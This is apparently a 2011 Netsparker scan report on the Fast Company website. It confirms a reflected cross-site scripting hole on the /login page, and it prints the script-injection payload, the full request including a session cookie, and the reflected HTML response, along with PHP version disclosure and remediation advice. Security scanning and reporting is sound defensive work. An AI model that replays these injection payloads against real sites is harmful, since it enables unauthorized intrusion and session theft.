|
Loading
XSS, Cross Site Scripting, CWE-79, CAPEC-86, Javascript InjectionNetsparker - Scan Report Summary
|
||||||||||
|
Total RequestsAverage Speedreq/sec. |
4
identified
1
confirmed
0
critical
2
informational
|
||||||||
GHDB, DORK TestsGHDB, DORK Tests
|
||||||||||
|
Authentication
Scheduled
|
|||||||||
VULNERABILITIESVulnerabilities
|
||
 |
IMPORTANT
25 %
LOW
25 %
INFORMATION
50 %
|
|
Cross-site Scripting
Cross-site Scripting
1
TOTAL
IMPORTANT
CONFIRMED
1
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.
XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.
Impact
There are many different attacks that can be leveraged through the use of XSS, including:
- Hi-jacking users' active session
- Changing the look of the page within the victims browser.
- Mounting a successful phishing attack.
- Intercept data and perform man-in-the-middle attacks.
Remedy
The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.
Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.
There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.
Remedy References
External References
|
- /login
/login CONFIRMED |
Parameters
| Parameter | Type | Value |
| Query Based | QUERYSTRING | '"--></style></script><script>alert(0x000012)</script> |
Request
GET /login?'"--></style></script><script>netsparker(0x000012)</script> HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.fastcompany.com
Cookie: SESS016578d1318953fcdc44103ac4a9b3f3=fhvnd5apq25g1l5p87mjf0dl23
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.fastcompany.com
Cookie: SESS016578d1318953fcdc44103ac4a9b3f3=fhvnd5apq25g1l5p87mjf0dl23
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Sun, 06 Mar 2011 19:46:12 GMT
Server: VoxCAST
X-Powered-By: PHP/5.2.14
X-Drupal-Cache: MISS
Expires: Sun, 06 Mar 2011 20:06:13 GMT
Last-Modified: Sun, 06 Mar 2011 19:46:12 GMT
Cache-Control: max-age=0, s-maxage=1200, store, must-revalidate, post-check=0, pre-check=0
ETag: "1299440772-1"
Vary: Cookie,Accept-Encoding
Content-Encoding:
X-Served-By: daa-www014
Content-Length: 6449
Content-Type: text/html; charset=utf-8
X-Cache: MISS from VoxCAST
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <!-- ChartBeat --> <script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script> <title>Login or Sign Up | Fast Company</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><!--Visual Revenue Reader Response Tracking Script (v5) --><script type="text/javascript">var _vrid = 25;var _vrtrack = function(){};(function(d, a) { var s = d.createElement(a), x = d.getElementsByTagName(a)[0]; s.async = true; s.src = 'http://a.visualrevenue.com/vr.js'; x.parentNode.insertBefore(s, x);})(document, 'script');</script><!-- End of VR RR Tracking Script - All rights reserved --><meta name="DC.Title" content="Fast Company | Where Ideas and People Meet" /><meta name="robots" content="index,follow" /><link rel="shortcut icon" href="http://vox.fastcompany.com/files/fc_v1_favicon.ico" type="image/x-icon" /><link type="text/css" rel="stylesheet" media="all" href="/files/css/37ef444150d1622ad295d8e4c7546866.css" /><link type="text/css" rel="stylesheet" media="print" href="/files/css/b97c9c919d1fe905df2c76cdeee021c3.css" /> <script type="text/javascript" src="/files/js/4615cc22a03b22b826f5edd501349778.js"></script> <!--[if lt IE 7]> <style type="text/css" media="all">@import "/sites/all/themes/fc_v1/stylesheets/fix-ie.css";</style> <![endif]--> <!--[if IE]> <style> #dsq-content iframe { border: 1px solid #666 !important; } </style> <![endif]--> <link rel="canonical" href="/login?'"--></style></script><script>netsparker(0x000012)</script>" /> </head> <body class="sidebar-right no-border"> <div id="block-fc_ads-fc_ads_pixel" class="clear-block block block-fc_ads"> <div class="content"><script language="JavaScript" type="text/javascript">document.write('<script language="JavaScript" src="http://ad.doubleclick.net/adj/mansueto.fc/generic;sz=1x1;pos=top;dcove=d;tile='+(Drupal.fcadstile++)+';lan=en;c_type=generic;cms=d56b699830e77ba53855679cb1d252da;ord=' + Drupal.fcadsord + '?" type="text/javascript"><\/script>');</script><noscript><a href="http://ad.doubleclick.net/jump/mansueto.fc/generic;sz=1x1;pos=top;dcove=d;tile=5;lan=en;c_type=generic;cms=d56b699830e77ba53855679cb1d252da;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/mansueto.fc/generic;sz=1x1;pos=top;dcove=d;tile=5;lan=top;c_type=generic;cms=d56b699830e77ba53855679cb1d252da;ord=123456789?" width="1" height="1" border="0" alt=""/></a></noscript></div> </div><div id="interstitial_ad"></div> <!-- SiteCatalyst code version: H.14.Copyright 1997-2007 Omniture, Inc. More info available athttp://www.omniture.com --><script language="JavaScript" src="/sites/all/themes/fc_v1/s_code.js"></script><script language="JavaScript"><!--/* You may give each page an identifying name, server, and channel onthe next lines. */
s.prop11 = ''
s.prop1 = ''
s.prop6 = ''
s.prop13 = ''
s.prop9 = ''
s.prop38= ""
s.pageName = 'login:'
s.prop5 = 'login'
s.channel = 'mansueto.fc/ros'
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s.t();if(s_code)document.write(s_code)//--></script> <script language='JavaScript'><!-- if(navigator.appVersion.indexOf('MSIE')>=0)document.write(unescape('%3C')+'\!-'+'-') //--></script><!--/DO NOT REMOVE/--> <!-- End SiteCatalyst code version: H.14. --><div id="usertoolbar"><div id="usertoolbar_inner1"><div id="usertoolbar_inner2"> <div id="usertoolbar_rss"><noscript>Using a mobile device? Go to <a href="http://m.fastcompany.com">m.fastcompany.com</a> for our mobile version.</noscript> <a href="/rss.xml">RSS</a></div> <div id="usertoolbar_rsslogo"><a href="/rss.xml"><img src="/sites/all/themes/fc_v1/images/icon_rss.gif" alt="FastCompany RSS Feed"></a></div> <!--<div id="usertoolbar_newsletters"><a href="/my/newsletters">Newsletters</a></div>//--> <div id="toolbar_blocks"> <div id="block-fc_profiles-0" class="clear-block block block-fc_profiles"> <div class="content"><div id='login_link'><a href='/login' class='modalInputSignup' rel='#login_form_overlay'>Login or Signup</a></div></div> </div></div> <script language="Javascript">//writeName();</script> <br clear="all"></div></div></div><!-- Layout --><div id="sitewrapper"><div class="header"> <!-- START: new Header --> <div class="header-inner"> <div class="header-row-one"> <div class="header-row-one-inner"> <div class="site-logo"> <div class="site-logo-inner"> <a href="/"><img src="/files/fc_v1_logo2.gif" width="251px" height="68px" alt="Fast Company Logo" title="Fast Company Logo" /> </a> </div> </div> <div class="banner-advt"> <div class="banner-advt-inner"> <div id="block-fc_ads-fc_ads_leaderboard" class="clear-block block block-fc_ads"> <div class="content"><script language="JavaScript" type="text/javascript">document.write('<script language="JavaScript" src="http://ad.doubleclick.net/adj/mansueto.fc/generic;sz=728x90;pos=top;dcove=d;tile='+(Drupal.fcadstile++)+';dcopt=ist;lan=en;c_type=generic;cms=d56b699830e77ba53855679cb1d252da;ord=' + Drupal.fcadsord + '?" type="text/javascript"><\/script>');</script><noscript><a href="http://ad.doubleclick.net/jump/mansueto.fc/generic;sz=728x90;pos=top;dcove=d;tile=4;dcopt=ist;lan=en;c_type=generic;cms=d56b699830e77ba53855679cb1d252da;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/mansueto.fc/generic;sz=728x90;pos=top;dcove=d;tile=4;dcopt=ist;lan=top;c_type=generic;cms=d56b699830e77ba53855679cb1d252da;ord=123456789?" width="728" height="90" border="0" alt=""/></a></noscript></div> </div> </div> </div> </div> </div> <div class="header-row-two"> <div class="header-row-two-inner"> <ul class="links primary-links"><li class="first menu-1-1-2"><a href="/topics/technology" class="menu-1-1-2"><img src="/sites/all/themes/fc_v1/images/spacer.gif" alt="Technology"></a></li> <li class="menu-1-2-2"><a href="http://www.fastcodesign.com" title="Design" class="menu-1-2-2"><img src="/sites/all/themes/fc_v1/images/spacer.gif" alt="Designs"></a></li> <li class="menu-1-3-2"><a href="/topics/ethonomics" title="Ethonomics" class="menu-1-3-2"><img src="/sites/all/themes/fc_v1/images/spacer.gif" alt="Ethonomics"></a></li> <li class="last menu-1-4-2"><a href="/topics/leadership" title="Leadership" class="menu-1-4-2"><img src="/sites/all/themes/fc_v1/images/spacer.gif" alt="Leadership"></a></li> </ul> <div class="extralinks"> <a href="/magazine" title="Magazine" class="extra-leadership"><img src="/sites/all/themes/fc_v1/images/spacer.gif" alt="Magazine"></a> <a href="http://trax.fastcompany.com/k/w/sub/box-text" title="Subscribe" class="extra-community"><img src="/sites/all/themes/fc_v1/images/spacer.gif" alt="Community"></a> <a href="http://jobs.fastcompany.com/?partner=fcmasthead" title="Jobs" class="extra-jobs"><img src="/sites/all/themes/fc_v1/images/spacer.gif" alt="Jobs"></a> </div> <div class="header-search"> <div class="header-search-inner"> <div id="block-fc_helper-fc_search" class="clear-block block block-fc_helper"> <h2><span><none></span></h2> <div class="content"><form action="/search/google" accept-charset="UTF-8" method="get" id="fc-helper-search-form"><div><div class="form-item" id="edit-search-wrapper"> <input type="text" maxlength="128" name="search" id="edit-search" size="60" value="" class="form-text" /></div><input type="hidden" name="cx" id="edit-cx" value="partner-pub-9871731465474413:6yw1dauulom" /><input type="hidden" name="cof" id="edit-cof" value="FORID:11" /><input type="submit" name="sa" id="edit-submit" value="Search" class="form-submit google-search-submit" /><input type="hidden" name="form_id" id="edit-fc-helper-search-form" value="fc_helper_search_form" /></div></form></div> </div> </div> </div> </div> </div> </div></div><!--END: new Header --> <img id="print-logo" src="/sites/all/themes/fc_v1/images/logo.gif" /> <div id="content"> <div id="center"> <div id="left_forms"><form action="/login?destination=login%3F%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Enetsparker%25280x000012%2529%253C%2Fscript%253E%3D" accept-charset="UTF-8" method="post" id="profilLoginForm" target="_top"><div><div class="login_headline_text">Member Login</div><div class="form-item" id="edit-name-wrapper"> <input type="text" maxlength="60" name="name" id="edit-name" size="20" value="Email" class="form-text required" /></div><div class="form-item" id="edit-pass-wrapper"> <input type="password" name="pass" id="edit-pass" maxlength="60" size="20" class="form-text required" /></div><input type="submit" name="op" id="edit-submit" value="" class="form-submit" /><div class="item-list"><ul><li><a href="/" title="Request new password via e-mail." id="forgotten_pass" onclick="return false;">forgot your password?</a></li></ul></div><div id="catch_err"></div><div class="login_headline_text" id="forgot_pass"></div><input type="hidden" name="form_id" id="edit--profileLoginForm" value="_profileLoginForm" /></div></form><br /><form action="/login?'"--></style></script><script>netsparker(0x000012)</script>" accept-charset="UTF-8" method="post" id="user-pass"><div><div class="form-item" id="edit-name-wrapper"> <label for="edit-name">Username or e-mail address: <span class="form-required" title="This field is required.">*</span></label> <input type="text" maxlength="64" name="name" id="edit-name" size="60" value="" class="form-text required" /></div><input type="hidden" name="form_id" id="edit-user-pass" value="user_pass" /><input type="submit" name="op" id="edit-submit" value="E-mail new password" class="form-submit" /></div></form></div><form action="/login?'"--></style></script><script>netsparker(0x000012)</script>" accept-charset="UTF-8" method="post" id="profileSignUpForm" target="_top"><div><div class="login_headline_text">Sign Up<span class="login_required_fields"><span style="color:red;">*</span>Required Field</span></div><div class="form-item" id="edit-regFullName-wrapper"> <input type="text" maxlength="60" name="regFullName" id="edit-regFullName" size="15" value="" class="form-text required" /></div><div class="form-item" id="edit-regEmail-wrapper"> <input type="text" maxlength="64" name="regEmail" id="edit-regEmail" size="15" value="" class="form-text required" /></div><div class="form-item" id="edit-regPassClear-wrapper"> <input type="text" maxlength="60" name="regPassClear" id="edit-regPassClear" size="15" value="" class="form-text" /></div><div class="form-item" id="edit-regPass-wrapper"> <input type="password" name="regPass" id="edit-regPass" maxlength="60" size="15" class="form-text required" /></div><div class="signup_blurb">Registering for Fast Company is easy, just fill in the blanks above and submit a comment. Once your account is approved, update your profile page and start a discussion. Your email will not be shared with the public, or any third-party advertisers.</div><input type="submit" name="op" id="edit-submit" value="" class="form-submit" /><input type="hidden" name="form_id" id="edit--profileSignUpForm" value="_profileSignUpForm" /></div></form> </div><!--// ENDS CENTER --> <div id="sidebar-two"> <div class="block-wrap row1"> <div id="block-fc_blocks-rs_block_sitewide_1" class="clear-block block block-fc_blocks"> <div class="content"> <div class="rs_it_wrap"> <div class="rs_it_deck"> <div class="rs_deck_content 1734356"> <a href="/1734356/blind-people-drive-paralyzed-people-walk-at-ted">Welcome to the TED Revival: Blind People Drive, Paralyzed People Walk</a> </div> </div> <div class="rs_it_image"> <a href="/1734356/blind-people-drive-paralyzed-people-walk-at-ted"><img src="http://www.fastcompany.com/files/imagecache/rs_145_image/files/thumb-blind-driver-challenge-ted.jpg" alt="" title="" /></a> </div> </div></div> </div> <div id="block-fc_ads-fc_ads_imu1" class="clear-block block block-fc_ads"> <div class="content"><script language="JavaScript" type="text/javascript">document.write('<script language="JavaScript" src="http://ad.doubleclick.net/adj/mansueto.fc/generic;sz=336x280,300x250,300x600;pos=top;dcove=d;tile='+(Drupal.fcadstile++)+';lan=en;c_type=generic;cms=d56b699830e77ba53855679cb1d252da;ord=' + Drupal.fcadsord + '?" type="text/javascript"><\/script>');</script><noscript><a href="http://ad.doubleclick.net/jump/mansueto.fc/generic;sz=336x280,300x250,300x600;pos=top;dcove=d;tile=1;lan=en;c_type=generic;cms=d56b699830e77ba53855679cb1d252da;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/mansueto.fc/generic;sz=336x280,300x250,300x600;pos=top;dcove=d;tile=1;lan=top;c_type=generic;cms=d56b699830e77ba53855679cb1d252da;ord=123456789?" width="336" height="280" border="0" alt=""/></a></noscript><p class="advertisement">ADVERTISEMENT</p></div> </div> <div id="block-fc_blocks-rs_block_sitewide_2" class="clear-block block block-fc_blocks"> <div class="content"> <div class="rs_it_wrap"> <div class="rs_it_deck"> <div class="rs_deck_content 1734461"> <a href="/1734461/jimmy-wales-wikipedia-google-content-farms-matt-cutts-demand-media">Hey Jimmy Wales, What Do You Think of Content Farms?</a> </div> </div> <div ..
Date: Sun, 06 Mar 2011 19:46:12 GMT
Server: VoxCAST
X-Powered-By: PHP/5.2.14
X-Drupal-Cache: MISS
Expires: Sun, 06 Mar 2011 20:06:13 GMT
Last-Modified: Sun, 06 Mar 2011 19:46:12 GMT
Cache-Control: max-age=0, s-maxage=1200, store, must-revalidate, post-check=0, pre-check=0
ETag: "1299440772-1"
Vary: Cookie,Accept-Encoding
Content-Encoding:
X-Served-By: daa-www014
Content-Length: 6449
Content-Type: text/html; charset=utf-8
X-Cache: MISS from VoxCAST
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <!-- ChartBeat --> <script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script> <title>Login or Sign Up | Fast Company</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><!--Visual Revenue Reader Response Tracking Script (v5) --><script type="text/javascript">var _vrid = 25;var _vrtrack = function(){};(function(d, a) { var s = d.createElement(a), x = d.getElementsByTagName(a)[0]; s.async = true; s.src = 'http://a.visualrevenue.com/vr.js'; x.parentNode.insertBefore(s, x);})(document, 'script');</script><!-- End of VR RR Tracking Script - All rights reserved --><meta name="DC.Title" content="Fast Company | Where Ideas and People Meet" /><meta name="robots" content="index,follow" /><link rel="shortcut icon" href="http://vox.fastcompany.com/files/fc_v1_favicon.ico" type="image/x-icon" /><link type="text/css" rel="stylesheet" media="all" href="/files/css/37ef444150d1622ad295d8e4c7546866.css" /><link type="text/css" rel="stylesheet" media="print" href="/files/css/b97c9c919d1fe905df2c76cdeee021c3.css" /> <script type="text/javascript" src="/files/js/4615cc22a03b22b826f5edd501349778.js"></script> <!--[if lt IE 7]> <style type="text/css" media="all">@import "/sites/all/themes/fc_v1/stylesheets/fix-ie.css";</style> <![endif]--> <!--[if IE]> <style> #dsq-content iframe { border: 1px solid #666 !important; } </style> <![endif]--> <link rel="canonical" href="/login?'"--></style></script><script>netsparker(0x000012)</script>" /> </head> <body class="sidebar-right no-border"> <div id="block-fc_ads-fc_ads_pixel" class="clear-block block block-fc_ads"> <div class="content"><script language="JavaScript" type="text/javascript">document.write('<script language="JavaScript" src="http://ad.doubleclick.net/adj/mansueto.fc/generic;sz=1x1;pos=top;dcove=d;tile='+(Drupal.fcadstile++)+';lan=en;c_type=generic;cms=d56b699830e77ba53855679cb1d252da;ord=' + Drupal.fcadsord + '?" type="text/javascript"><\/script>');</script><noscript><a href="http://ad.doubleclick.net/jump/mansueto.fc/generic;sz=1x1;pos=top;dcove=d;tile=5;lan=en;c_type=generic;cms=d56b699830e77ba53855679cb1d252da;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/mansueto.fc/generic;sz=1x1;pos=top;dcove=d;tile=5;lan=top;c_type=generic;cms=d56b699830e77ba53855679cb1d252da;ord=123456789?" width="1" height="1" border="0" alt=""/></a></noscript></div> </div><div id="interstitial_ad"></div> <!-- SiteCatalyst code version: H.14.Copyright 1997-2007 Omniture, Inc. More info available athttp://www.omniture.com --><script language="JavaScript" src="/sites/all/themes/fc_v1/s_code.js"></script><script language="JavaScript"><!--/* You may give each page an identifying name, server, and channel onthe next lines. */
s.prop11 = ''
s.prop1 = ''
s.prop6 = ''
s.prop13 = ''
s.prop9 = ''
s.prop38= ""
s.pageName = 'login:'
s.prop5 = 'login'
s.channel = 'mansueto.fc/ros'
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s.t();if(s_code)document.write(s_code)//--></script> <script language='JavaScript'><!-- if(navigator.appVersion.indexOf('MSIE')>=0)document.write(unescape('%3C')+'\!-'+'-') //--></script><!--/DO NOT REMOVE/--> <!-- End SiteCatalyst code version: H.14. --><div id="usertoolbar"><div id="usertoolbar_inner1"><div id="usertoolbar_inner2"> <div id="usertoolbar_rss"><noscript>Using a mobile device? Go to <a href="http://m.fastcompany.com">m.fastcompany.com</a> for our mobile version.</noscript> <a href="/rss.xml">RSS</a></div> <div id="usertoolbar_rsslogo"><a href="/rss.xml"><img src="/sites/all/themes/fc_v1/images/icon_rss.gif" alt="FastCompany RSS Feed"></a></div> <!--<div id="usertoolbar_newsletters"><a href="/my/newsletters">Newsletters</a></div>//--> <div id="toolbar_blocks"> <div id="block-fc_profiles-0" class="clear-block block block-fc_profiles"> <div class="content"><div id='login_link'><a href='/login' class='modalInputSignup' rel='#login_form_overlay'>Login or Signup</a></div></div> </div></div> <script language="Javascript">//writeName();</script> <br clear="all"></div></div></div><!-- Layout --><div id="sitewrapper"><div class="header"> <!-- START: new Header --> <div class="header-inner"> <div class="header-row-one"> <div class="header-row-one-inner"> <div class="site-logo"> <div class="site-logo-inner"> <a href="/"><img src="/files/fc_v1_logo2.gif" width="251px" height="68px" alt="Fast Company Logo" title="Fast Company Logo" /> </a> </div> </div> <div class="banner-advt"> <div class="banner-advt-inner"> <div id="block-fc_ads-fc_ads_leaderboard" class="clear-block block block-fc_ads"> <div class="content"><script language="JavaScript" type="text/javascript">document.write('<script language="JavaScript" src="http://ad.doubleclick.net/adj/mansueto.fc/generic;sz=728x90;pos=top;dcove=d;tile='+(Drupal.fcadstile++)+';dcopt=ist;lan=en;c_type=generic;cms=d56b699830e77ba53855679cb1d252da;ord=' + Drupal.fcadsord + '?" type="text/javascript"><\/script>');</script><noscript><a href="http://ad.doubleclick.net/jump/mansueto.fc/generic;sz=728x90;pos=top;dcove=d;tile=4;dcopt=ist;lan=en;c_type=generic;cms=d56b699830e77ba53855679cb1d252da;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/mansueto.fc/generic;sz=728x90;pos=top;dcove=d;tile=4;dcopt=ist;lan=top;c_type=generic;cms=d56b699830e77ba53855679cb1d252da;ord=123456789?" width="728" height="90" border="0" alt=""/></a></noscript></div> </div> </div> </div> </div> </div> <div class="header-row-two"> <div class="header-row-two-inner"> <ul class="links primary-links"><li class="first menu-1-1-2"><a href="/topics/technology" class="menu-1-1-2"><img src="/sites/all/themes/fc_v1/images/spacer.gif" alt="Technology"></a></li> <li class="menu-1-2-2"><a href="http://www.fastcodesign.com" title="Design" class="menu-1-2-2"><img src="/sites/all/themes/fc_v1/images/spacer.gif" alt="Designs"></a></li> <li class="menu-1-3-2"><a href="/topics/ethonomics" title="Ethonomics" class="menu-1-3-2"><img src="/sites/all/themes/fc_v1/images/spacer.gif" alt="Ethonomics"></a></li> <li class="last menu-1-4-2"><a href="/topics/leadership" title="Leadership" class="menu-1-4-2"><img src="/sites/all/themes/fc_v1/images/spacer.gif" alt="Leadership"></a></li> </ul> <div class="extralinks"> <a href="/magazine" title="Magazine" class="extra-leadership"><img src="/sites/all/themes/fc_v1/images/spacer.gif" alt="Magazine"></a> <a href="http://trax.fastcompany.com/k/w/sub/box-text" title="Subscribe" class="extra-community"><img src="/sites/all/themes/fc_v1/images/spacer.gif" alt="Community"></a> <a href="http://jobs.fastcompany.com/?partner=fcmasthead" title="Jobs" class="extra-jobs"><img src="/sites/all/themes/fc_v1/images/spacer.gif" alt="Jobs"></a> </div> <div class="header-search"> <div class="header-search-inner"> <div id="block-fc_helper-fc_search" class="clear-block block block-fc_helper"> <h2><span><none></span></h2> <div class="content"><form action="/search/google" accept-charset="UTF-8" method="get" id="fc-helper-search-form"><div><div class="form-item" id="edit-search-wrapper"> <input type="text" maxlength="128" name="search" id="edit-search" size="60" value="" class="form-text" /></div><input type="hidden" name="cx" id="edit-cx" value="partner-pub-9871731465474413:6yw1dauulom" /><input type="hidden" name="cof" id="edit-cof" value="FORID:11" /><input type="submit" name="sa" id="edit-submit" value="Search" class="form-submit google-search-submit" /><input type="hidden" name="form_id" id="edit-fc-helper-search-form" value="fc_helper_search_form" /></div></form></div> </div> </div> </div> </div> </div> </div></div><!--END: new Header --> <img id="print-logo" src="/sites/all/themes/fc_v1/images/logo.gif" /> <div id="content"> <div id="center"> <div id="left_forms"><form action="/login?destination=login%3F%2527%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Enetsparker%25280x000012%2529%253C%2Fscript%253E%3D" accept-charset="UTF-8" method="post" id="profilLoginForm" target="_top"><div><div class="login_headline_text">Member Login</div><div class="form-item" id="edit-name-wrapper"> <input type="text" maxlength="60" name="name" id="edit-name" size="20" value="Email" class="form-text required" /></div><div class="form-item" id="edit-pass-wrapper"> <input type="password" name="pass" id="edit-pass" maxlength="60" size="20" class="form-text required" /></div><input type="submit" name="op" id="edit-submit" value="" class="form-submit" /><div class="item-list"><ul><li><a href="/" title="Request new password via e-mail." id="forgotten_pass" onclick="return false;">forgot your password?</a></li></ul></div><div id="catch_err"></div><div class="login_headline_text" id="forgot_pass"></div><input type="hidden" name="form_id" id="edit--profileLoginForm" value="_profileLoginForm" /></div></form><br /><form action="/login?'"--></style></script><script>netsparker(0x000012)</script>" accept-charset="UTF-8" method="post" id="user-pass"><div><div class="form-item" id="edit-name-wrapper"> <label for="edit-name">Username or e-mail address: <span class="form-required" title="This field is required.">*</span></label> <input type="text" maxlength="64" name="name" id="edit-name" size="60" value="" class="form-text required" /></div><input type="hidden" name="form_id" id="edit-user-pass" value="user_pass" /><input type="submit" name="op" id="edit-submit" value="E-mail new password" class="form-submit" /></div></form></div><form action="/login?'"--></style></script><script>netsparker(0x000012)</script>" accept-charset="UTF-8" method="post" id="profileSignUpForm" target="_top"><div><div class="login_headline_text">Sign Up<span class="login_required_fields"><span style="color:red;">*</span>Required Field</span></div><div class="form-item" id="edit-regFullName-wrapper"> <input type="text" maxlength="60" name="regFullName" id="edit-regFullName" size="15" value="" class="form-text required" /></div><div class="form-item" id="edit-regEmail-wrapper"> <input type="text" maxlength="64" name="regEmail" id="edit-regEmail" size="15" value="" class="form-text required" /></div><div class="form-item" id="edit-regPassClear-wrapper"> <input type="text" maxlength="60" name="regPassClear" id="edit-regPassClear" size="15" value="" class="form-text" /></div><div class="form-item" id="edit-regPass-wrapper"> <input type="password" name="regPass" id="edit-regPass" maxlength="60" size="15" class="form-text required" /></div><div class="signup_blurb">Registering for Fast Company is easy, just fill in the blanks above and submit a comment. Once your account is approved, update your profile page and start a discussion. Your email will not be shared with the public, or any third-party advertisers.</div><input type="submit" name="op" id="edit-submit" value="" class="form-submit" /><input type="hidden" name="form_id" id="edit--profileSignUpForm" value="_profileSignUpForm" /></div></form> </div><!--// ENDS CENTER --> <div id="sidebar-two"> <div class="block-wrap row1"> <div id="block-fc_blocks-rs_block_sitewide_1" class="clear-block block block-fc_blocks"> <div class="content"> <div class="rs_it_wrap"> <div class="rs_it_deck"> <div class="rs_deck_content 1734356"> <a href="/1734356/blind-people-drive-paralyzed-people-walk-at-ted">Welcome to the TED Revival: Blind People Drive, Paralyzed People Walk</a> </div> </div> <div class="rs_it_image"> <a href="/1734356/blind-people-drive-paralyzed-people-walk-at-ted"><img src="http://www.fastcompany.com/files/imagecache/rs_145_image/files/thumb-blind-driver-challenge-ted.jpg" alt="" title="" /></a> </div> </div></div> </div> <div id="block-fc_ads-fc_ads_imu1" class="clear-block block block-fc_ads"> <div class="content"><script language="JavaScript" type="text/javascript">document.write('<script language="JavaScript" src="http://ad.doubleclick.net/adj/mansueto.fc/generic;sz=336x280,300x250,300x600;pos=top;dcove=d;tile='+(Drupal.fcadstile++)+';lan=en;c_type=generic;cms=d56b699830e77ba53855679cb1d252da;ord=' + Drupal.fcadsord + '?" type="text/javascript"><\/script>');</script><noscript><a href="http://ad.doubleclick.net/jump/mansueto.fc/generic;sz=336x280,300x250,300x600;pos=top;dcove=d;tile=1;lan=en;c_type=generic;cms=d56b699830e77ba53855679cb1d252da;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/mansueto.fc/generic;sz=336x280,300x250,300x600;pos=top;dcove=d;tile=1;lan=top;c_type=generic;cms=d56b699830e77ba53855679cb1d252da;ord=123456789?" width="336" height="280" border="0" alt=""/></a></noscript><p class="advertisement">ADVERTISEMENT</p></div> </div> <div id="block-fc_blocks-rs_block_sitewide_2" class="clear-block block block-fc_blocks"> <div class="content"> <div class="rs_it_wrap"> <div class="rs_it_deck"> <div class="rs_deck_content 1734461"> <a href="/1734461/jimmy-wales-wikipedia-google-content-farms-matt-cutts-demand-media">Hey Jimmy Wales, What Do You Think of Content Farms?</a> </div> </div> <div ..
PHP Version Disclosure
PHP Version Disclosure
1
TOTAL
LOW
Netsparker identified that the target web server is disclosing the PHP version in use through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of PHP.
Impact
An attacker can look for specific security vulnerabilities for the version identified. Also the attacker can use this information in conjunction with the other vulnerabilities in the application or the web server.
|
- /login
/login |
Extracted Version
PHP/5.2.4
Request
HEAD /login HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Accept: netsparker/check
Cache-Control: no-cache
Host: www.fastcompany.com
Cookie: SESS016578d1318953fcdc44103ac4a9b3f3=fhvnd5apq25g1l5p87mjf0dl23
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Accept: netsparker/check
Cache-Control: no-cache
Host: www.fastcompany.com
Cookie: SESS016578d1318953fcdc44103ac4a9b3f3=fhvnd5apq25g1l5p87mjf0dl23
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Sun, 06 Mar 2011 19:45:42 GMT
Server: VoxCAST
X-Powered-By: PHP/5.2.4
X-Drupal-Cache: HIT
Cache-Control: max-age=0, s-maxage=1200, store, must-revalidate, post-check=0, pre-check=0
Expires: Sun, 06 Mar 2011 20:05:20 GMT
Etag: "1299440720-1"
Last-Modified: Sun, 06 Mar 2011 19:45:20 GMT
Vary: Cookie,Accept-Encoding
Content-Encoding:
X-Served-By: daa-www010
Content-Type: text/html; charset=utf-8
X-Cache: MISS from VoxCAST
Date: Sun, 06 Mar 2011 19:45:42 GMT
Server: VoxCAST
X-Powered-By: PHP/5.2.4
X-Drupal-Cache: HIT
Cache-Control: max-age=0, s-maxage=1200, store, must-revalidate, post-check=0, pre-check=0
Expires: Sun, 06 Mar 2011 20:05:20 GMT
Etag: "1299440720-1"
Last-Modified: Sun, 06 Mar 2011 19:45:20 GMT
Vary: Cookie,Accept-Encoding
Content-Encoding:
X-Served-By: daa-www010
Content-Type: text/html; charset=utf-8
X-Cache: MISS from VoxCAST
Crossdomain.xml Identified
Crossdomain.xml Identified
1
TOTAL
INFORMATION
